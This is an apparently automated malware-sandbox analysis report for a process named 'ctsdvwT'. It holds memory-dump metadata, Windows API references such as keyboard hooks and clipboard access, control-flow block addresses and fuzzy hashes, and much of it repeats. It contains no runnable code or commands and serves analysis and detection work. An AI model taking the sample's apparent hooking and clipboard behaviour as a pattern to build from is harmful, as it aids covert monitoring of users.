                                        • Source File: 0000000A.00000002.1947190571.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_e5d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:

                                        Execution Graph

                                        Execution Coverage:10.6%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:0%
                                        Total number of Nodes:177
                                        Total number of Limit Nodes:18
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:

                                        Control-flow Graph

                                        APIs
                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 068B8A8A
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4190880608.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_68b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: CreateWindow
                                        • String ID:
                                        • API String ID: 716092398-0

                                        Control-flow Graph

                                        APIs
                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 068B8A8A
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4190880608.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_68b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: CreateWindow
                                        • String ID:
                                        • API String ID: 716092398-0

                                        Control-flow Graph

                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 068BC75F
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4190880608.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_68b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0

                                        Control-flow Graph

                                        APIs
                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 068BD629
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4190880608.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_68b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: CallProcWindow
                                        • String ID:
                                        • API String ID: 2714655100-0

                                        Control-flow Graph

                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4190880608.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_68b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: Clipboard
                                        • String ID:
                                        • API String ID: 220874293-0

                                        Control-flow Graph

                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4190880608.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_68b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: Clipboard
                                        • String ID:
                                        • API String ID: 220874293-0

                                        Control-flow Graph

                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 068BC75F
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4190880608.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_68b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0

                                        Control-flow Graph

                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 068BC75F
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4190880608.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_68b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0

                                        Control-flow Graph

                                        APIs
                                        • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 068BFE83
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4190880608.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_68b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: HookWindows
                                        • String ID:
                                        • API String ID: 2559412058-0

                                        Control-flow Graph

                                        APIs
                                        • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 068BFE83
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4190880608.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_68b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: HookWindows
                                        • String ID:
                                        • API String ID: 2559412058-0
                                        • Opcode ID: 5ab423c4f2a8b487acb71062de2ca0eef163f6fac1e1a008df4d584574a29c3e
                                        • Instruction ID: 31d6215295637ea614a942d7eefea5769b65cd0788f5ff94b2f4463a1244c389
                                        • Opcode Fuzzy Hash: 5ab423c4f2a8b487acb71062de2ca0eef163f6fac1e1a008df4d584574a29c3e
                                        • Instruction Fuzzy Hash: BC2124B5D002499FDB14CF9AC844BEEFBF5FB88310F10842AE518A7250C775A945CFA0

                                        Control-flow Graph (graph image not rendered; executed/not-executed colouring lost in extraction)
                                        • Basic blocks and edges: 1041 68b5e4c-68b7910 1043 68b7918-68b7943 GetModuleHandleW 1041->1043 1044 68b7912-68b7915 1041->1044 1045 68b794c-68b7960 1043->1045 1046 68b7945-68b794b 1043->1046 1044->1043 1046->1045
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 068B7936
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4190880608.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_68b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: eee8c36c10857d0988b6999fcaf2348869d6b5494c6311b2fa05af3d1e49e457
                                        • Instruction ID: 4b3002491a09f75878b84c6ee8fa0e8c33c956ec98b5152abae69d5f950110d6
                                        • Opcode Fuzzy Hash: eee8c36c10857d0988b6999fcaf2348869d6b5494c6311b2fa05af3d1e49e457
                                        • Instruction Fuzzy Hash: 2E11EFB5C007498FDB20CF9AC444BDEFBF4AB89224F10842AD929B7750D379A545CFA5

                                        Control-flow Graph (graph image not rendered; executed/not-executed colouring lost in extraction)
                                        • Basic blocks and edges: 1048 68b78ca-68b7910 1049 68b7918-68b7943 GetModuleHandleW 1048->1049 1050 68b7912-68b7915 1048->1050 1051 68b794c-68b7960 1049->1051 1052 68b7945-68b794b 1049->1052 1050->1049 1052->1051
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 068B7936
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4190880608.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_68b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: a1652650ad3fb49694d91f54bc41f1fdf3e4d23d9598a1fbe7154e6faf9a2082
                                        • Instruction ID: 60db857aaa4ac865ebcde7f889862348be4cdba6a4699134a256a1425d49f5e9
                                        • Opcode Fuzzy Hash: a1652650ad3fb49694d91f54bc41f1fdf3e4d23d9598a1fbe7154e6faf9a2082
                                        • Instruction Fuzzy Hash: 3A11EFB5C006898FDB20CF9AD444ADEFBF4AB89220F14856AD469A7710C379A546CFA1

                                        Control-flow Graph (graph image not rendered; executed/not-executed colouring lost in extraction)
                                        • Basic blocks and edges: 1054 68bc2e4-68bd90c KiUserCallbackDispatcher 1057 68bd90e-68bd914 1054->1057 1058 68bd915-68bd929 1054->1058 1057->1058
                                        APIs
                                        • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,068BD875), ref: 068BD8FF
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4190880608.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_68b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: CallbackDispatcherUser
                                        • String ID:
                                        • API String ID: 2492992576-0
                                        • Opcode ID: 2e507ac4d84e85c64a58efd0c71cfc3ea9b83837fb6a6637e6d8ca140ed96969
                                        • Instruction ID: 152e81b876f1250c01e83834b2cdb520c6e1509b545dd6139d5136aaaa7474d7
                                        • Opcode Fuzzy Hash: 2e507ac4d84e85c64a58efd0c71cfc3ea9b83837fb6a6637e6d8ca140ed96969
                                        • Instruction Fuzzy Hash: B71133B58003499FCB20DF9AD484BDEBBF4EB48314F20842AE918A3350C375A944CFA4

                                        Control-flow Graph (graph image not rendered; executed/not-executed colouring lost in extraction)
                                        • Basic blocks and edges: 1060 68bdb8c-68be1d2 OleInitialize 1062 68be1db-68be1f8 1060->1062 1063 68be1d4-68be1da 1060->1063 1063->1062
                                        APIs
                                        • OleInitialize.OLE32(00000000), ref: 068BE1C5
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4190880608.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_68b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: Initialize
                                        • String ID:
                                        • API String ID: 2538663250-0
                                        • Opcode ID: 880559228ed64e685724f476df90a0571bff23110e65f94c94452edd08865834
                                        • Instruction ID: fae576ddd5337a947cd259fb8781904f82aa9d5dd075ab17840d8d4dc9b0868f
                                        • Opcode Fuzzy Hash: 880559228ed64e685724f476df90a0571bff23110e65f94c94452edd08865834
                                        • Instruction Fuzzy Hash: FF1145B4800349CFCB20CFAAC448BDEBBF4EB48310F24881AE519A7300C374A944CFA4

                                        Control-flow Graph (graph image not rendered; executed/not-executed colouring lost in extraction)
                                        • Basic blocks and edges: 1066 68be169 1067 68be170-68be1d2 OleInitialize 1066->1067 1068 68be1db-68be1f8 1067->1068 1069 68be1d4-68be1da 1067->1069 1069->1068
                                        APIs
                                        • OleInitialize.OLE32(00000000), ref: 068BE1C5
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4190880608.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_68b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: Initialize
                                        • String ID:
                                        • API String ID: 2538663250-0
                                        • Opcode ID: 48b7a5b6a319c532088089eb0fc6074f37b8e50e119f857ab5e5e4f407b96a72
                                        • Instruction ID: b8d8c1b8c94361fec29f0bed1c07e8f0c2715ab022d2cbe13b4b615ccafc9880
                                        • Opcode Fuzzy Hash: 48b7a5b6a319c532088089eb0fc6074f37b8e50e119f857ab5e5e4f407b96a72
                                        • Instruction Fuzzy Hash: 691103B58007498FCB20CF9AD448BDEFBF8AB48214F248859E559A7740C374A545CFA5
                                        APIs
                                        • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,068BD875), ref: 068BD8FF
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4190880608.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_68b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: CallbackDispatcherUser
                                        • String ID:
                                        • API String ID: 2492992576-0
                                        • Opcode ID: c3fab5ee4db58b9a254992590a5d3404ce138aedd2dba2667febcd30f8adb7b7
                                        • Instruction ID: afbaa164c8cfe5138e81a89359ff6c81296618c47d61d2440109e2360a26dabf
                                        • Opcode Fuzzy Hash: c3fab5ee4db58b9a254992590a5d3404ce138aedd2dba2667febcd30f8adb7b7
                                        • Instruction Fuzzy Hash: E51100B580028A8FDB20CF9AD484BDEBBF4EF48324F20845AE559A7250C374A544CFA4
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 22a0cbd1bc586b7dd781759bd0ca13d2aa242b9ab375b836c9a16dc15ab4bc1a
                                        • Instruction ID: 0481647a5a5e7cdeceb5ffa2a7b8a74cb294ba7cecfb2eade54cdd4523c4083a
                                        • Opcode Fuzzy Hash: 22a0cbd1bc586b7dd781759bd0ca13d2aa242b9ab375b836c9a16dc15ab4bc1a
                                        • Instruction Fuzzy Hash: 04D1AD71B012058FDB54EFA8D8807AEB7B6FF89310F1485AAE409EB395DB35D841CB90
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a0630e1cece2b71809917df3afb14d640976546d890941fb1af553346d9060dc
                                        • Instruction ID: 5e34ce31a3f716a2ed5dfa6f0105faf479876b5cebc7f44572ea8d067f4935c0
                                        • Opcode Fuzzy Hash: a0630e1cece2b71809917df3afb14d640976546d890941fb1af553346d9060dc
                                        • Instruction Fuzzy Hash: C3C16E30700202ABDB65B728F99825973EAFBC5714B248979D049CB359CF76DC4ACB91
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4467fe348e10ade034ee048ca42e3d62ac926e469bfe7b923819a09841f83062
                                        • Instruction ID: 3eecb5f51b9a527d0529c1388f6266195ede8c710e0844948a9b3e2d3a7ab7df
                                        • Opcode Fuzzy Hash: 4467fe348e10ade034ee048ca42e3d62ac926e469bfe7b923819a09841f83062
                                        • Instruction Fuzzy Hash: A6B18D34B052059FCB14EFA8D888AADBBF2FF88310F548569E806D7355DB359C42CB90
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b79f411cac6a6e028f03f8feb1cbaf2988743de6af635a374c5b816964a82110
                                        • Instruction ID: e0b341c210d88cee5f3d9defbe077f1ab51e231186d6de8482bbbd8c4a5ec8fe
                                        • Opcode Fuzzy Hash: b79f411cac6a6e028f03f8feb1cbaf2988743de6af635a374c5b816964a82110
                                        • Instruction Fuzzy Hash: CEB15C70E0131ADFDB50EFAAC88179DFBF2AF88314F198529D454EB294EB749845CB81
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 485418e8a43f0cb3afdb88caf2332b1d79f632c22e3926eb1ee4632ae32cece0
                                        • Instruction ID: 9c4446c8db6301a240c1d0da445c887b161732346096fece74bbc53069f03bca
                                        • Opcode Fuzzy Hash: 485418e8a43f0cb3afdb88caf2332b1d79f632c22e3926eb1ee4632ae32cece0
                                        • Instruction Fuzzy Hash: 72A17F74E0120ADFDF50EFAAC8817DEBBF2AF88714F188129E454EB254DB749845CB85
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 601b849b09a48e76bc893edc0cee807d797b43b746243a9ea0f3f604b726a2ac
                                        • Instruction ID: e47219aacac723b2687c79a1d92de9b7d56949430cdf5ee7a27903dc2c04c8e2
                                        • Opcode Fuzzy Hash: 601b849b09a48e76bc893edc0cee807d797b43b746243a9ea0f3f604b726a2ac
                                        • Instruction Fuzzy Hash: 46719E70E0134ADFDB10EFAAC8817DDFBF1AF88314F188529E454AB250EB749846CB95
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 43e4aa70861a5b3ddfc32ddbd77d98e6e0c666e5185955931d9ac30818d370fd
                                        • Instruction ID: cb3be8a6f1759a7e486950befedb7526787ff3091b348d5c571417c503eefd4b
                                        • Opcode Fuzzy Hash: 43e4aa70861a5b3ddfc32ddbd77d98e6e0c666e5185955931d9ac30818d370fd
                                        • Instruction Fuzzy Hash: 60719170E0130ADFDB10DFAAC8817DDFBF2AF88314F188529E454AB250EB749846CB84
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9a4012f16a5c0dc6fbea3e1295a1b650277f9f15741becacea79e9e1e7b7e265
                                        • Instruction ID: d6b85d45ac1d7fdae9916f2952aa7b444dd3d0b8ae7eb7764a0a1968e4b8234b
                                        • Opcode Fuzzy Hash: 9a4012f16a5c0dc6fbea3e1295a1b650277f9f15741becacea79e9e1e7b7e265
                                        • Instruction Fuzzy Hash: A8512F70D112188FDB18DFA9C885B9EBBF1BF48310F19852AE855BB391CB75A844CB94
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c81de325879e0418600564566b497e2eee0c14cfd24996bbdeee4bcb70d98555
                                        • Instruction ID: 40c56704d7f560fbb886a3d8d2fb15b0205b86369ae06d2b858615702f37ea78
                                        • Opcode Fuzzy Hash: c81de325879e0418600564566b497e2eee0c14cfd24996bbdeee4bcb70d98555
                                        • Instruction Fuzzy Hash: 60513270D112188FDB18DFA9C884B9EFBF1BF48310F198429E855BB390CB75A844CB94
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0b716a19d9561af2d1bb04adaa6065a590c75d0f32ca2afeb76dc62dea32039d
                                        • Instruction ID: b3592ad62973eeac63dc565a57c10d8a02af026bbd33e97c68e21b76b9a02ba0
                                        • Opcode Fuzzy Hash: 0b716a19d9561af2d1bb04adaa6065a590c75d0f32ca2afeb76dc62dea32039d
                                        • Instruction Fuzzy Hash: 1841813160A3A59FDB1BEB3898602D97FB0AF86144F0904E7C0C5DF2A3D7254C4AC7A6
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fa617637c74cef9bc86bd8c722b0201cd2d32855e6cac0675db9e888a6560cd9
                                        • Instruction ID: b166cfad9b4d82721a5dcea3e68e0a5ceeb66a17a023123d8ad8cc45be66fd42
                                        • Opcode Fuzzy Hash: fa617637c74cef9bc86bd8c722b0201cd2d32855e6cac0675db9e888a6560cd9
                                        • Instruction Fuzzy Hash: 4A410E30700206CFEB95EB38D65426E3BE6BF85640B684468D046EB395EF35CC06C7A1
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a0019c50574b118e7baee2e86eceac58fa725ebb28856b7c3cc1eca061f8c2b0
                                        • Instruction ID: 4bec895f945fa1b60fddb9941ff8e0a4b84547b0e189694e94646d8cee6d93a9
                                        • Opcode Fuzzy Hash: a0019c50574b118e7baee2e86eceac58fa725ebb28856b7c3cc1eca061f8c2b0
                                        • Instruction Fuzzy Hash: 8F513F30302242EFCB25EB3CFE899567B61F799700300A5A9D0045B266DB3F6D09CFA6
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5775fcf569a636bb7558159faedd92598a9b3a452a5b923680b2f933ab1d722c
                                        • Instruction ID: a4a52d0b1d7bab0078b0ad03038c397d1c100a82cb65a4c774ad51a6321b0e71
                                        • Opcode Fuzzy Hash: 5775fcf569a636bb7558159faedd92598a9b3a452a5b923680b2f933ab1d722c
                                        • Instruction Fuzzy Hash: 04510D30302242EFCB25EB2CFE899567B61F799704301A5A9D0045B266DB3F6D09CFA6
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0bd4a79bf45d0f4c4469a44d1cf3ad5dddd7212b606be5a9c847a0c5b9bd240b
                                        • Instruction ID: 6008e305b9c9cc3e82be1d7c012c003a49b347c14ed7d5f70b27078470b88957
                                        • Opcode Fuzzy Hash: 0bd4a79bf45d0f4c4469a44d1cf3ad5dddd7212b606be5a9c847a0c5b9bd240b
                                        • Instruction Fuzzy Hash: 5531A170E11219DBDB15EFA4C44079EB7B6FF45700F248465F841FB294D771A8458B51
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f9b8a0e8c421d6de380d88b7e612d1db359c307c76ba58004c14f5d7425885da
                                        • Instruction ID: c6792cb531b7e6c92c597c79da105180b3cab002fd90c0e04027a3ca05801ba2
                                        • Opcode Fuzzy Hash: f9b8a0e8c421d6de380d88b7e612d1db359c307c76ba58004c14f5d7425885da
                                        • Instruction Fuzzy Hash: 06316B30E15206DBCB18DF64D89469EB7F2FF89304F148529E846EB750DB71AC46CB91
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7a374da943a59d11494a72c3559def50af02443fe794dd5d19ad00375206cd5c
                                        • Instruction ID: e14542e2f5eb33376a0377d232e2e619a3904638b7805cab5fc1a1a76a97f24f
                                        • Opcode Fuzzy Hash: 7a374da943a59d11494a72c3559def50af02443fe794dd5d19ad00375206cd5c
                                        • Instruction Fuzzy Hash: D0319E30E1120ADBDB24EFA4D4407AEB7B6FF85710F248565F841FB254EB71A885CB51
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 60d77c6329b090e5417b3e9de877eb3061b8d3077ace4aa1c638793a0650e6eb
                                        • Instruction ID: 852d7f9e95d7ac48dda7bf656966e6df958c3e78dbb337166c0906252a081f15
                                        • Opcode Fuzzy Hash: 60d77c6329b090e5417b3e9de877eb3061b8d3077ace4aa1c638793a0650e6eb
                                        • Instruction Fuzzy Hash: 74314134701214DFDF69EB78D9546AEB7F6AF89201F1405B8D441AB391DB3B9C02CB92
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5f9aed6dae747c0ae34aa15b50c54e02a44f79ddf46bea6019851a9dec505811
                                        • Instruction ID: d568194dcc71ff2610561bfa78f53244ab011e559854b6740801a560412011cb
                                        • Opcode Fuzzy Hash: 5f9aed6dae747c0ae34aa15b50c54e02a44f79ddf46bea6019851a9dec505811
                                        • Instruction Fuzzy Hash: B6410FB5D01349DFDB14DFA9C480ADEBBF5FF48310F24842AE819AB250DB759946CB90
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4d9290cd783c554871e8f888fdd233f82e3d06bb6466def4e871b064be59bd05
                                        • Instruction ID: aac779640711917d2192d923c013e35daf3ef11f17f964e2cde0f2c4898da87a
                                        • Opcode Fuzzy Hash: 4d9290cd783c554871e8f888fdd233f82e3d06bb6466def4e871b064be59bd05
                                        • Instruction Fuzzy Hash: C2318C30E11206DBCB18DF64D89469EB7F6FF89300F148929E846EB350EB71AC46CB91
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
